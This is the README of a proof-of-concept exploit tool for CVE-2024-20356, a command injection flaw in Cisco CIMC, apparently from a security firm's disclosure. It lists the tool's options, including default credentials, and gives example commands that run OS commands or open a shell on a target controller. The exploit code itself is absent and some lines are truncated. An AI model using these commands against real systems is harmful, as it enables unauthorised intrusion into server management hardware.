# CVE-2024-20356
This is a proof of concept for CVE-2024-20356, a Command Injection vulnerability in Cisco's CIMC.

Full technical details can be found at [](

## Usage
Usage: [-h] -t HOST -u USERNAME -p PASSWORD [-a ACTION] [-c CMD] [-v]
  -h, --help            Show this help message and exit
  -t HOST, --host HOST  Target hostname or IP address (format or
  -u USERNAME, --username USERNAME
                        Username (default: admin)
  -p PASSWORD, --password PASSWORD
                        Password (default: cisco)
  -a ACTION, --action ACTION
                        Action: test, cmd, shell, dance (default: test)
  -c CMD, --cmd CMD     OS command to run (Default: NONE)
  -v, --verbose         Displays more information about cimc

Example commands:
``` --host 192.168.x.x -u admin -p your_password -v --host 192.168.x.x -u admin -p your_password -c 'id' --host 192.168.x.x -u admin -p your_password -a shell --host 192.168.x.x -u admin -p your_password -a dance

Use the `--help` argument for full usage instructions.

## Disclaimer
This proof-of-concept is for demonstration purposes and should not be used for illegal activities. LRQA Nettitude are not responsible for any damage caused by the use or misuse of this code.